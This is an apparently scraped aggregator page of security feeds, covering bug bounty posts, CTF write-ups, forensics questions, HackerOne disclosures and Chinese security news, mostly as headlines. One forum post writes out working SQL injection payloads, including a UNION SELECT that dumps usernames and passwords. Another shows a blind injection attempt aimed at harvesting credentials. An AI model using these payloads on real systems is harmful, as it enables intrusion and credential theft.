    Tesla Made their official Service Manuals accessible to users from their website www.service.tesla.com. Every PDF File from there, about Every Model, Accessories, Charger, Manuals, is mirrored onto GDrive. Check README file for more details. https://drive.google.com/drive/folders/1SVsmpITqgGbyRXEWGUC35AmPmR1SXRWo?usp=sharing submitted by /u/amritajaatak [link] [comments]
    About 750 academic books and journals from a single publisher
    https://tiendaeditorial.uca.es/descargas-pdf/ Site is the academic press of the Universidad de Cádiz. Most texts are in European Spanish, with a smattering of English and French. Many of the works concern the university or Cádiz. Topics are broad but mostly history, archaeology, linguistics, literature, poetry, with lesser amounts of math, medicine, science, computers, and others. submitted by /u/clarelucebooth [link] [comments]
  • Open

    Miniseries: XSS to the core — Pt.1
    Continue reading on Medium »
    AlbusSec:- Penetration-List 06 Command Injection — Sample
    Hi Information Security folk, I hope you liked the SQL-Injection Sample Series, Where You learned about SQL-Injection In-depth, However… Continue reading on Medium »
    Vulnerability In PayPal worth 200000$ bounty, Attacker can Steal Your Balance by One-Click
    what if I told you that: A black Hat hacker can steal your money from your bank account & credit card or PayPal balance with one click… Continue reading on Medium »
    2FA Bypass on private bug bounty program due to improper caching mechanism
    Hello All, Continue reading on Medium »
    2FA Bypass on private bug bounty program due to CSRF token misconfiguration
    Hello Friends, Continue reading on Medium »
    A good resource for learning penetration testing tools and methodology
    I was searching the internet and came across a good site to bypass 403, which could help me in many other topics … Continue reading on Medium »
  • Open

    connmap - X11 desktop widget that shows location of your current network peers on a world map
    submitted by /u/jafarlihi [link] [comments]
  • Open

    SecWiki News 2022-05-22 Review
    应急能力提升3:内网横向移动攻击模拟(上) by aerfa 应急能力提升2:挖矿权限维持攻击模拟 by aerfa 应急能力提升1:实战应急困境与突破 by aerfa 如何学习那么多的安全文章(实践篇) by aerfa 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-22 Review
    应急能力提升3:内网横向移动攻击模拟(上) by aerfa 应急能力提升2:挖矿权限维持攻击模拟 by aerfa 应急能力提升1:实战应急困境与突破 by aerfa 如何学习那么多的安全文章(实践篇) by aerfa 更多最新文章,请访问SecWiki
  • Open

    hackmyvm系列9——translator
    本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!所有环境均为在线下载的靶场,且在本机进行学习。
    MSF监听之加密流量下的后门上线
    本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
  • Open

    Can people with limited IT experience jump relatively straight into digital forensics?
    I’m interested in DF as a field ever since learning about it. I’m curious if I need to know a lot about cyber security and IT or if I can pick it up as I go along? Im talking about learning. A lot of the posts on Reddit say that you need to know about xyz well before you can get into “DFIR” but what if you’re just interested in digital forensics? submitted by /u/OpalDragonDagger [link] [comments]
    iPhone
    where can i purchase a cellebrite or software/product to review phone data such as photos, messages ect submitted by /u/PuzzleheadedRemote83 [link] [comments]
    How do you analyze memory acquisition from Windows 10 build 19044?
    Volatility2 does not have a profile beyond build 19041 yet and Volatility3 lacks of advanced plugins when it comes to malware analysis. How do you analyze a memory acquisition from Windows 10 build 19044? submitted by /u/jcbaptiste [link] [comments]
    Help needed with digital forensics case
    Hey guys. I’m currently studying a cyber security degree at a university and currently have to conduct digital forensics and form a report on a women who was suspected of malpractice (case back from 2014). I have evidence but it can be considered circumstantial. I’ve been using Autopsy (which is great), but I feel there is something missing that is tying all my evidence together. I’ve been given all their windows computer files. If you guys could possibly give me a few places to look at that would be great! Thanks!! submitted by /u/be-10 [link] [comments]
  • Open

    OTP Bypass on Vahak.in
    No content preview
    TryHackMe: Biblioteca
    No content preview
  • Open

    OTP Bypass on Vahak.in
    No content preview
    TryHackMe: Biblioteca
    No content preview
  • Open

    OTP Bypass on Vahak.in
    No content preview
    TryHackMe: Biblioteca
    No content preview

  • Open

    Accidentally posted nudes need help.
    Accidentally posted nudes to my snapchat story for 9 minutes before I realized and deleted them. The problem is I was so panicked at the time that I didnt check if anyone screenshotted them. Is there any possible way I could reach out to snapchat and find that deleted story? submitted by /u/KazaixX [link] [comments]
    Computer Forensics Help
    Hi everyone, I'm taking a digital forensics course soon. It'll start in a few weeks, but I would really like some advice or help on where to start. I'm really sorry to be so vague, but I genuinely don't know anything about this topic. I'm not sure where to start or what to do or how to study for it. I tried to google for maybe online textbooks or codelabs or something like that, but I feel like the resources are all over the place and it's just been really overwhelming to start. All the posts I've been reading here...I have no idea what they're talking about. And it's a bit sad because I would love to contribute to some of the discussions here, but I just don't know how. It's the start of summer, so I definitely have more time than usual. So I'd like a really good head start on the course that will start in a few weeks. If you had to give a complete newbie advice on where to start, I'd very very much appreciate it. Thank you! [link] [comments]
    Mac Forensics: Digital Collector vs. Recon RTI
    Greetings r/computerforensics, We've seen a huge decline in Macs hitting our lab over the last few years, but they still sprinkle in every now and then. We're evaluating our current licences and dropping our least used. For our primary Mac tool, we have to decide between Cellebrite Digital Collector and Sumuri Recon RTI. We're leaning to Recon, but would love to hear feedback on what you all are using and why. submitted by /u/BlockchainForensics [link] [comments]
  • Open

    Essential links for SOC Analysts
    Hi everyone. Previously, I shared an article on Essential tools for SOC analysts. Here I wanted to share a link-based post essential… Continue reading on Medium »
    Free DLP and personnel monitoring systems
    Today we will bypass OSINT-ers and make a selection for security people. Employee control systems and DLP. Simple but free: Continue reading on Medium »
  • Open

    Critical Vulnerability in Premium WordPress Themes Allows for Site Takeover
    Article URL: https://threatpost.com/vulnerability-wordpress-themes-site-takeover/179672/ Comments URL: https://news.ycombinator.com/item?id=31461535 Points: 2 # Comments: 0
    $10m bug bounty paid for Wormhole vulnerability
    Article URL: https://medium.com/immunefi/wormhole-uninitialized-proxy-bugfix-review-90250c41a43a Comments URL: https://news.ycombinator.com/item?id=31459244 Points: 2 # Comments: 0
  • Open

    How “Forgot Password” can cost you your account
    Continue reading on Medium »
    CVE-2022–1784 The Ssrf
    In this write up i am going to tell you about this awesome ssrf found by Hexatron rewarded with 900$ bounty Continue reading on Medium »
    A business Logic issue worth $1500
    Hello everyone, Continue reading on Medium »
    PayPal IDOR via billing Agreement Token (closed Informative, payment fraud)
    Continue reading on Medium »
    How I was able to down a service of Microsoft ? Denial of Service (DOS) Attack on Microsoft.
    Thank you for taking the time to read about “How I was able to down a service of Microsoft ? Denial of Service (DOS) Attack on Microsoft“ Continue reading on Medium »
  • Open

    SecWiki News 2022-05-21 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-21 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Metastealer – filling the Racoon void
    submitted by /u/digicat [link] [comments]
  • Open

    Client Side Bug, EP1 — Cross-site Request Forgery (CSRF/XSRF)
    Bug yang akan ‘memaksa’ user untuk melakukan sesuatu yang berbahaya! Continue reading on Medium »
  • Open

    Krátke ohliadnutie za výstavou— Pseudosféra Kláry Kusej
    V uličke tesne pri Michalskej bráne sa nachádza menšia galéria umenia - Galéria X. Continue reading on Medium »
  • Open

    A moderately sized GD folder with books and PDFs on hacking, cracking, networking and programming
    https://drive.google.com/drive/mobile/folders/1F7D5c30nP-y_Q7SFqoRTRvJ7tl0UcY3q submitted by /u/idkbutiwannalearn [link] [comments]
    Where can I find 3d character packs for free like businessman billy?
    The businessman billy pack has 2-3 similar packs too it, can someone please help me get them? A female 3d character pack will be ideal, I have only got the businessman billy pack from a local graphic designer's website. submitted by /u/Pythagoras16 [link] [comments]
  • Open

    How to make a used computer safe
    I bought a used MacBook Pro and want to make sure it's safe. I went into recovery mode (Cmd + R on boot) and reinstalled OSX. Is this sufficient to make sure any possible malware has been removed? What additional measures can/should I take to ensure the company is safe? submitted by /u/digitil [link] [comments]

  • Open

    Matryoshka Trap: Recursive MMIO Flaws Lead to VM Escape
    submitted by /u/Bison-Neat [link] [comments]
    When eBPF meets TLS! A Security Focused Introduction to eBPF
    submitted by /u/guedou [link] [comments]
    Hacking Chinese IoT FoR $10000
    submitted by /u/sciencestudent99 [link] [comments]
    A journey into IoT - Unknown Chinese alarm - Part 2 - Firmware dump and analysis
    submitted by /u/0xdea [link] [comments]
  • Open

    Cellebrite advise needed
    Received two (iPhone & Android) UFDR reports and Cellebrite Reader. For the iPhone I decided to export the searches as EML and bring it into our review platform. Reason I went with EML export was because it includes the message attachment within the EML message and our platform extracts it as parent child. It also populates the fields "TO" "FROM" "DATES" with receiver and sender. I am having trouble doing this with the Android. It has no EML export. PDF export would work but it creates hyperlinks with folders for the message attachments. Which makes it more difficult to tie the attachments to the message when I bring it into the review platform. Any suggestions would help. XML export support is on development at the moment. submitted by /u/theedon323 [link] [comments]
    Recovering deleted telegram messages
    What is a good tool that can help me with recovering deleted telegram messages? I have an iPhone with full file system extraction. I have tried Magnet AXIOM and it is able to extract recent telegram chats. It is clear from these chats that some messages were deleted by the user - which AXIOM unfortunately seems to be not able to retrieve. I tried manually searching through the sqlite db but did not have any luck. Oxygen forensics claimed a couple of years ago it could retrieve deleted telegram messages but there has not been a lot of discussion of this topic in the DFIR community since. Are deleted telegram messages a lost cause at this point? submitted by /u/Sea_Cold_7611 [link] [comments]
    Retrieve deleted picture.jpg from image in linux
    As the title says, I want to retrieve a jpg picture from an image I created in linux using dd. I used the fls command to find the inode of the picture and used it together with the istat command to view the meta data of the file. What I want to do now is basically extract this picture using dd. Like dd if=example.dd of=picture.jpg bs=... skip=... count=..., but there is one problem, I dont know what to enter on bs, skip and count. I've read that I need to calculate something but I feel that I need to understand the whole process in general instead of jumping right into the calculation. Anyone that has some time to explain this to me and maybe give me some examples by extracting something from your own images(if you have one). Would rly appreciate it! Thanks! submitted by /u/ahmedmourad22 [link] [comments]
  • Open

    5 Tips for new leads in Trace Labs Search Party
    I recently participated in the Trace Labs Search Party CTF, if you’re not familiar it’s a non-theoretical OSINT CTF where participants… Continue reading on Medium »
    War in Ukraine / May 19
    👉 Lend-Lease and Western Strategy [Expert View] Continue reading on Medium »
    All Defense Tool
    First of all congratulations on finding the treasure. This project integrates excellent offensive and defensive weapons projects in the… Continue reading on Medium »
  • Open

    Wormhole Uninitialized Proxy Bugfix Review
    Summary Continue reading on Immunefi »
    CVE-2021–43798 Grafana | Vulnerabilidade de leitura arbitrária não autorizada de arquivos
    Versão 8.3.0 Continue reading on Medium »
    I Obtained ADMIN access via Account Activation link [In 30 seconds]
    Folks, for those of you who didn’t know, I absolutely have a blast every-time I have to perform web app testing; because the way to… Continue reading on Medium »
    SSRF Leads To AWS Metadata Exposure
    How can you leverage an SSRF (“Server Side Request Forgery”) vulnerability to evade filters and leak internal AWS credentials on a web… Continue reading on System Weakness »
    Incentivized testing for $ZKP Advanced Staking is now LIVE!
    Advanced $ZKP Staking Testing with 100,000 $ZKP in rewards is starting today. Welcome to Panther Zafari’s Beta! Continue reading on Panther Protocol »
  • Open

    SecWiki News 2022-05-20 Review
    PE文件结构解析1 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-20 Review
    PE文件结构解析1 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    This website will shut down soon, but they have an open directory (the C-Disk) full of old pictures and weird software from the '90s/00's
    submitted by /u/dadumir_party [link] [comments]
    knitting patterns
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    deformed dogs and their owners
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Data hoarder archive found
    http://80.56.13.139/arc2/ submitted by /u/jaydenthorup [link] [comments]
  • Open

    Alan c2 Framework v7.0: Hyper-Pivoting
    submitted by /u/aparata_s4tan [link] [comments]
  • Open

    Clickjacking at app.lemlist.com
    lemlist disclosed a bug submitted by ondermedia: https://hackerone.com/reports/1574017
    Arbitrary POST request as victim user from HTML injection in Jupyter notebooks
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1409788 - Bounty: $8690
    Error in Deleting Deck cards attachment reveals the full path of the website
    Nextcloud disclosed a bug submitted by ctulhu: https://hackerone.com/reports/1354334 - Bounty: $100
    Nextcloud Deck : Possibility for anyone to add a stack with existing tasks on anyone's board
    Nextcloud disclosed a bug submitted by supr4s: https://hackerone.com/reports/1450117 - Bounty: $250
    Sensitive files/ data exists post deletion of user account
    Nextcloud disclosed a bug submitted by geekysherlock: https://hackerone.com/reports/1222873 - Bounty: $150
  • Open

    Splunk SPL Queries for Detecting gMSA Attacks
    1    Introduction What is a group Managed Service Account (gMSA)? If your job is to break into networks, a gMSA can be a prime target for a path to escalate privileges, perform credential access, move laterally or even persist in a domain via a ‘golden’ opportunity. If you’re an enterprise defender, it’s something you need... The post Splunk SPL Queries for Detecting gMSA Attacks appeared first on TrustedSec.
  • Open

    Widespread Swagger-UI library vulnerability leads to DOM XSS attacks
    Article URL: https://portswigger.net/daily-swig/widespread-swagger-ui-library-vulnerability-leads-to-dom-xss-attacks Comments URL: https://news.ycombinator.com/item?id=31447130 Points: 1 # Comments: 0
  • Open

    I Obtained ADMIN access via Account Activation link [In 30 seconds]
    Folks, for those of you who didn’t know, I absolutely have a blast every-time I have to perform web app testing; because the way to… Continue reading on Medium »
  • Open

    Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others)
    CVE-2022-22954, one of several recently published VMware vulnerabilities, is being exploited in the wild. Read our observations and recommendations. The post Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others) appeared first on Unit42.
  • Open

    雾帜智能:AI和SOAR技术加速自动化应急响应 | 网安新势力SOLO发布季
    本期节目请到了安全运营新势力,上海雾帜智能科技有限公司创始人兼CTO傅奎,分享《争分夺秒,加速应急响应》的议题。
    2022年CISO之声全球洞察报告 | 威胁的不确定性和错误的安全感
    各种备受瞩目的违规行为产生了深远的经济和安全影响,向世界展示了关键基础设施和供应链在成为网络犯罪分子的目标时是多么脆弱。
    上海安般科技招聘信息
    上海安般信息科技有限公司是发源于中国科学院微系统&amp;amp;上海科技大学,国内首家国际领先从事于商业化智能模糊测试技术的公司
    终端安全 | Intent重定向漏洞分析
    攻击者结合了系统应用中的动态广播注册漏洞模型和Intent重定向漏洞模型,对终端造成了极大的威胁。
    Conti光速倒闭?或许它只是换个方式重生
    前脚还在叫嚣要推翻哥斯达黎加政府,后脚就宣布倒闭?据Advanced Intel透露,其内部基础设施已关闭。
    关于恶意邮件的防范及处置措施
    钓鱼邮件是黑客经常采用的手段之一,黑客利用钓鱼邮件进行网络安全攻击的案例比比皆是。
    FreeBuf周报 | 游戏巨头暴雪再遭DDoS攻击;苹果紧急更新修复零日漏洞
    各位FreeBufer周末好~以下是本周的「FreeBuf周报」。
    奇形怪状之java框架漏洞
    是人都能看懂的框架漏洞讲解~
    权威认可!斗象科技荣获CNNVD优秀技术支撑单位和CNNVD特殊贡献奖
    斗象科技作为CNNVD一级技术支撑单位,被授予“CNNVD 2021年度优秀技术支撑单位”和 “2021年度特殊贡献”两大奖项
    RSA创新沙盒盘点|BastionZero——零信任基础设施访问服务
    <p>RSAConference2022将于旧金山时间6月6日召开。大会的Innovation Sandbox(沙盒)大赛作为&ldquo;安全圈的奥斯卡&rdquo;,每年都备受瞩目,成为全球网络安
    美国CFAA迎来重大修订,白帽黑客或将无责
    CFAA明确指出网络安全研究人员或白帽黑客有着“改善技术”的良好愿景,因此司法部门将不再以CFAA起诉他们。
    比渗透测试更有用,红队演练该如何开展?
    对于大多数企业组织而言,真正的纵深防御战略应该包括红队演练这个环节。
    微软检测到Linux XorDDoS恶意软件活动激增
    一种用于入侵Linux设备并构建DDoS僵尸网络的隐秘模块化恶意软件的活动量大幅增加了254%.
    日经新闻亚洲子公司遭勒索软件攻击
    据出版巨头日经新闻(Nikkei)透露,该集团在新加坡的总部于5月13日遭到勒索软件攻击。
    黑客创建“机器人”电话,企图浪费俄罗斯官员时间
    黑客创建一网站,允许访问者随机选择两名俄罗斯官员拨打恶作剧电话,浪费他们的时间。
    FreeBuf甲方群话题讨论 | 聊聊“删库”这件事
    链家数据库管理员删库一案表明,删库已成为企业面对来自内部的安全风险时不得不顾及的要素之一,为此企业应该如何应对?
    ATT&CK 框架真的只是花架子吗?
    聊聊玄学的ATT&amp;amp;CK落地
  • Open

    Implementing Security in SDLC
    Introduction Continue reading on InfoSec Write-ups »
    Wireless Penetration Testing (WPA-2 Cracking)
    No content preview
    Cyber Apocalypse CTF 2022 — Web — Intergalactic Post Write-up
    No content preview
    Cyber Apocalypse CTF 2022 — Web — Amidst Us Write-up
    No content preview
    Cyber Apocalypse CTF 2022 — Misc — Compressor Write-up (easy way)
    No content preview
    Cyber Apocalypse CTF 2022 — Web — Kryptos Support Write-up
    No content preview
    Cyber Apocalypse CTF 2022 — Intergalactic Chase Write up
    No content preview
  • Open

    Implementing Security in SDLC
    Introduction Continue reading on InfoSec Write-ups »
    Wireless Penetration Testing (WPA-2 Cracking)
    No content preview
    Cyber Apocalypse CTF 2022 — Web — Intergalactic Post Write-up
    No content preview
    Cyber Apocalypse CTF 2022 — Web — Amidst Us Write-up
    No content preview
    Cyber Apocalypse CTF 2022 — Misc — Compressor Write-up (easy way)
    No content preview
    Cyber Apocalypse CTF 2022 — Web — Kryptos Support Write-up
    No content preview
    Cyber Apocalypse CTF 2022 — Intergalactic Chase Write up
    No content preview
  • Open

    Implementing Security in SDLC
    Introduction Continue reading on InfoSec Write-ups »
    Wireless Penetration Testing (WPA-2 Cracking)
    No content preview
    Cyber Apocalypse CTF 2022 — Web — Intergalactic Post Write-up
    No content preview
    Cyber Apocalypse CTF 2022 — Web — Amidst Us Write-up
    No content preview
    Cyber Apocalypse CTF 2022 — Misc — Compressor Write-up (easy way)
    No content preview
    Cyber Apocalypse CTF 2022 — Web — Kryptos Support Write-up
    No content preview
    Cyber Apocalypse CTF 2022 — Intergalactic Chase Write up
    No content preview
  • Open

    CVE-2022-26809 RPC 高危漏洞复现与分析
    作者:HuanGMz@知道创宇404实验室 时间:2022年5月20日 1. 漏洞介绍 2022年4月份修复的高危漏洞 CVE-2022-26809 距今已经过去一月有余,期间除了 L1nk 师傅发了一篇关于 GetCoalescedBuffer() 漏洞函数触发条件的分析,再无其他消息。我这边虽然分析出了 ProcessReceivedPDU() 漏洞函数的触发逻辑,但苦于无法在默认系...
  • Open

    CVE-2022-26809 RPC 高危漏洞复现与分析
    作者:HuanGMz@知道创宇404实验室 时间:2022年5月20日 1. 漏洞介绍 2022年4月份修复的高危漏洞 CVE-2022-26809 距今已经过去一月有余,期间除了 L1nk 师傅发了一篇关于 GetCoalescedBuffer() 漏洞函数触发条件的分析,再无其他消息。我这边虽然分析出了 ProcessReceivedPDU() 漏洞函数的触发逻辑,但苦于无法在默认系...

  • Open

    Wiping a lot of SSDs
    I work in corporate legal doing e-discovery work. The end of the process for most of my cases involves destruction of the collected data. I've been using DBAN to wipe spinning rust drives for years, as well as SSDs as they started to replace HDDs. The newer laptops with UEFI and no legacy boot make using DBAN challenging. When DBAN didn't work, I'd connect it through a USB adapter, boot into Linux, mount it RW, and just sudo dc3dd wipe=/dev/sdc A few months ago, a co-worker pointed out that an SSD might move data into an overwritten sector while the wipe is in process, meaning that with these processes, we can't be sure that all data's been wiped. We've got two cases that might wrap up in the next few months where I've collected 100+ M.2 2280 SSDs. Most (but not all) of the drives are BitLocker encrypted. In theory I could just clear my hands like a blackjack dealer and say "not my problem; keyless encryption is as good as wiping," but 1) I'm not certain every drive is encrypted, and 2) I'm not certain BitLocker protects everything (boot sector? MFTs?) in an unretrievable manner. Some of the data We could also toss them in a box for Iron Mountain to deal with, but for "reasons" (i.e., some data should pass through as few hands as possible) we'd prefer to know that it's done internally and not handed off to an outside vendor. Physical destruction is an option, but burning through a few thousand dollars in otherwise usable SSDs feels like a waste. These SSDs are all from Dell laptops, but have various SSD manufacturers, including Intel, Lite-On, Samsung, Toshiba, SanDisk, and SK Hynix. I might be able to budget several hundred dollars for hardware or software, but this isn't the kind of thing that I need to do more than once every few years, so a costly one-time solution isn't a good option (compared to swapping out SSDs one at a time in my free time for the next year or so). What approach would you take in this situation? submitted by /u/RulesLawyer42 [link] [comments]
    plaso timeline analysis
    I'm new to plaso, I know how to create one but I don't know how it be helpful or where to look when I want to know when was backdoor file created or if the antivirus detected malicious file or the creation time of backdoor registry key Is there some examples that might help making things clear ? submitted by /u/sk8er_girl90 [link] [comments]
    PST search tool
    Any good programs where I can import a PST and do searches, tag and export those tags to PST submitted by /u/theedon323 [link] [comments]
    Trying to play security camera footage from 2004. It's going as well as you'd expect.
    I'm trying to extract video footage that was downloaded from an unknown security system back in 2004. The files were originally on an Iomega 100mb Zip Drive if anyone remembers those things. I transferred the files to my laptop, and in the folder there was included a program called "Image Vault Viewer" (IVViewer.exe) which I assume is supposed to be the player application. (I had to open it in XP Compatibility Mode to get it to run.) When I choose to open a file from the application interface, I'm only allowed to select one file type (.cls) and I get an error as shown in the video. I recorded my screen so you can see all the different file types in the folder, as well as the error when trying to open something. A note, the (.vls) files show as being associated with IVViewer because I tried to open them with that program. That didn't work. You'll also see an "Ableton Live Set" (.als) file, but that's probably because I have Ableton audio installed on my laptop. I'm sure that 18 years ago the (.als) file extension was associated with something else. Can anyone give me some tips here? The video files show a murder occurring. The suspect was on the run for years and was just recently caught, but technology has advanced so much since then that this older stuff is really hard to work with. Thanks! https://reddit.com/link/ut3z7z/video/no7r4aujsf091/player submitted by /u/YabbaDabbaDoofus [link] [comments]
    Snapchat Forensics on smartphones
    Hi, fellow experts, I've been testing Snapchat's features and have a few questions to ask: Is it possible to recover Snapchat text messages (not images & videos) on Android and Apple smartphones? I can see images under Snapchat file folder on the phone. Is it possible to know who sent them (Snapchat username)? I'm having a hard time determining the correlation between XML record and actual image. Is there a sure way to determine who sent what? submitted by /u/Dreamlad [link] [comments]
    Digital Forensics Masterclass
    submitted by /u/cybersocdm [link] [comments]
  • Open

    Rolling Thunder is a Go
    How Ottawa’s War Memorial is becoming a symbol of polarization and division Continue reading on Medium »
    War in Ukraine / May 18
    The Russian army reduced the offensive Continue reading on Medium »
    One day in a life of OSINT geek: how Data Lookup helps to learn a lot in a couple of clicks
    We are actively developing our online Data Lookup tool, as more and more users tend to fulfill their OSINT tasks using quick and simple… Continue reading on Medium »
    Find anything online with Google dorks — part 1
    Google dorks are a fantastic way to to quickly filter search results and find an absolute treasure trove of information online. By simply… Continue reading on Medium »
    My Telegram investigation toolkit…
    Hooray, my channel has exceeded 200 subscribers… As promised, I am posting my selection of sources intended for investigations in Telegram… Continue reading on Medium »
  • Open

    Bug Bounty Diaries #2
    Hi guys! I’m back with a new blog and this is great because again… I learn a lot of things, specially about DNS, IP and things like that. Continue reading on Medium »
    A Story of DOM XSS
    Good day, everyone! This is my second article, this time on DOM XSS. An open redirection vulnerability was escalated to DOM XSS. If you… Continue reading on Medium »
    Cyber Apocalypse CTF 2022 — Intergalactic Chase Write up
    Hello everyone I am Hac and today we are doing Cyber Apocalypse CTF 2022 , Specifically this challenges :- Continue reading on InfoSec Write-ups »
    Hacking Web3: Introduction and How to Start
    Web3 is a newfound technology, and it’s claimed that it can greatly increase the security on the websites using it. In fact, web3 is a new… Continue reading on CoinsBench »
    Hacking Web3: Introduction and How to Start
    Web3 is a newfound technology, and it’s claimed that it can greatly increase the security on the websites using it. In fact, web3 is a new… Continue reading on Medium »
    How I was able to access IBM internal documents
    Hi, today I will share how I was able to access internal data of https://weathercommunity.ibm.com using salesforce misconfiguration. Continue reading on Medium »
    From Wayback to Account Takeover
    Hi, I would like to share how Wayback Machine leads to limited Account Takeover. Continue reading on Medium »
    CRLF (%0D%0A) Injection
    Hello Guys! I am vasu a bug bounty researcher Continue reading on Medium »
    How I Got $1083 worth of book bundle for just $1 — #Bugbounty
    Price manipulation at checkout: Continue reading on Medium »
    How I Exploited 4 Vulnerabilities In A Website
    This blog is only for informational purpose only so that emerging bug hunters could follow similar methodology and responsibly disclose… Continue reading on Medium »
    A pragmatic guide to building your bug bounty program
    Part 1: Getting set up, and maintaining your program Continue reading on Airwallex Engineering »
  • Open

    Scam and Malicious APK targeting Malaysian: MyMaidKL Technical Analysis
    submitted by /u/Rempah [link] [comments]
    Rise in XorDdos: A deeper look at the stealthy DDoS malware targeting Linux devices
    submitted by /u/SCI_Rusher [link] [comments]
    Exploiting an Unbounded memcpy in a Guest-to-Host escape of Parallels Desktop
    submitted by /u/gaasedelen [link] [comments]
    Killnet Attacks Against Italy and NATO Countries
    submitted by /u/MiguelHzBz [link] [comments]
  • Open

    Weaponization of Excel Add-Ins Part 2: Dridex Infection Chain Case Studies
    We discuss XLL and XLM droppers that deliver Dridex samples. We cover examples of the Dridex infection chain. The post Weaponization of Excel Add-Ins Part 2: Dridex Infection Chain Case Studies appeared first on Unit42.
  • Open

    【安全通报】VMware 身份验证绕过漏洞(CVE-2022-22972)
    近日,VMware 官方发布安全公告修复了一个高威胁性的身份验证绕过漏洞,该漏洞涉及 Workspace ONE Access、Identity Manager 和 vRealize Automation 产品,目前...
  • Open

    【安全通报】VMware 身份验证绕过漏洞(CVE-2022-22972)
    近日,VMware 官方发布安全公告修复了一个高威胁性的身份验证绕过漏洞,该漏洞涉及 Workspace ONE Access、Identity Manager 和 vRealize Automation 产品,目前...
  • Open

    How Dual Messenger technically works on Samsung devices
    I know that Android os is a privilege-separated OS in which each application have a separate /data folder in which it writes and each app has its own PID , with that mentioned I believe that my question's answer can easily be observed through a rooted devices i.e how an applied dual messenger is structured its folders etc, are these two apps ( the original and clone) share same storage? anyone could give a technical detail how this works? ​ Thanks submitted by /u/Camera-Soft [link] [comments]
    Does a DNS enabled "gray-net", akin to the dark net w/ onion sites, exist?
    Question spawned from: https://www.reddit.com/r/degoogle/comments/usi7w7/protonmail_ios_android_mobile_apps_sending/i97bt4a/ https://www.reddit.com/r/privacy/comments/uscrg2/protonmail_app_on_ios_regularly_talking_to_google/ https://www.reddit.com/r/ProtonMail/comments/uscbnz/protonmail_app_on_ios_constantly_talking_to/i93is94/ tl;dr - proton github source code for a few of their different apps reference the host dMFYGSLTQOJXXI33ONVQWS3BOMNUA.protonpro.xyz. Traditional ping & nslookup do not find the host dMFYGSLTQOJXXI33ONVQWS3BOMNUA.protonpro.xyz. Using a tool that can do DoH to quad9, dMFYGSLTQOJXXI33ONVQWS3BOMNUA.protonpro.xyz resolves to dayana.ns.cloudflare.com. I'm not a DNS wizard, so I'm not sure if I'm understanding this right, so call me out: is it possible for 3rd party DNS providers to have hosts that resolve only thru that 3rd party, and only over DoH vs traditional DNS??? i.e. a "gray net" that's only resolveable via certain DNS methods? submitted by /u/SOsint [link] [comments]
    Unable to install VirtualBox NDIS6 Bridged Networking Driver.
    Hello, I am having trouble installing the NDIS6 Bridged Networking Driver. I tried to install the program in the title in my environment and got the message "The requested functionality was not found. The specified module cannot be found" and I cannot install it. I have no idea which module to install, etc., so I would like to know the solution. submitted by /u/Awkward_String139 [link] [comments]
    deleted post with solutions: 'Hi, code injection help please'
    Hi, I'm typing 1' or ‘1’=’1 in the search box when trying to find all the persons, usernames and passwords in the database. But I get the following error message: ​ There was error in your query: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1 ​ The Server version is : Apache/2.4.41 (Ubuntu) and I found that is version MariaDB-5.5.41 ​How can find the right syntax?​ Thanks ​ SOLUTIONS: It worked with typing only ' OR 1=1; # for showing all the persons in the database ​ And ' UNION SELECT null, username, password FROM users # ​ to find all the usernames and passwords in the database. submitted by /u/Traditional_Bird_877 [link] [comments]
    Help with blind SQL injection please
    Hello, I need to get the usernames and passwords from an Online Auction System: http://www.blabla.com/index.php?product=Chair ​ I've tried injecting this but no results: /index.php?product=select%20username,%20password%20from%20users%20where%20product=Chair%20and%201%3D1%20%23 ​ Can i have some help? Thanks submitted by /u/Traditional_Bird_877 [link] [comments]
    Cannot create host-only adapter on VirtualBox
    I am unable to create a host-only adapter. I am using version 6.1.22. The following is the error message. Querying NetCfgInstanceId failed (0x00000002). Exit code : E_FAIL (0x80004005) Component: HostNetworkInterfaceWrap Interface: IHostNetworkInterface {455f8c45-44a0-a470-ba20-27890b96dba9} submitted by /u/Awkward_String139 [link] [comments]
  • Open

    8x8pilot.com: Reflected XSS in Apache Tomcat /jsp-examples example directory
    8x8 disclosed a bug submitted by huntinex: https://hackerone.com/reports/1400357
    Stored XSS in repository file viewer
    GitLab disclosed a bug submitted by kannthu: https://hackerone.com/reports/1072868 - Bounty: $2000
    Email html Injection
    Slack disclosed a bug submitted by smitgharat0001: https://hackerone.com/reports/1461194 - Bounty: $250
    XSS and iframe injection on tiktok ads portal using redirect params
    TikTok disclosed a bug submitted by cancerz: https://hackerone.com/reports/1514554 - Bounty: $1000
  • Open

    SecWiki News 2022-05-19 Review
    Wobfuscator:将部分JavaScript恶意代码转换为WebAssembly以逃避检测 by ourren 基础架构安全弹性技术指南草案(固件安全篇) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-19 Review
    Wobfuscator:将部分JavaScript恶意代码转换为WebAssembly以逃避检测 by ourren 基础架构安全弹性技术指南草案(固件安全篇) by ourren 更多最新文章,请访问SecWiki
  • Open

    Disclosure of Top Vulnerability
    Article URL: https://hackerone.com/reports/397031 Comments URL: https://news.ycombinator.com/item?id=31436248 Points: 1 # Comments: 0
  • Open

    OSS-Fuzz: Continuous Fuzzing for Open Source Software
    Article URL: https://google.github.io/oss-fuzz/ Comments URL: https://news.ycombinator.com/item?id=31435504 Points: 2 # Comments: 0
  • Open

    Java反序列化基础篇-01-反序列化概念与利用
    写这篇文章,是想在 Java 反序列化基础的地方再多过几遍,毕竟万丈高楼平地起。
    有手就行的白加黑实战免杀
    超级干货!有手就行的白加黑实战免杀!
    虚假广告广泛撒网,你被钓鱼了吗?
    保持警惕,保持怀疑。
    FreeBuf早报 | 2021 年赎金需求激增 45%;德州近 200 万个人信息被曝光了三年
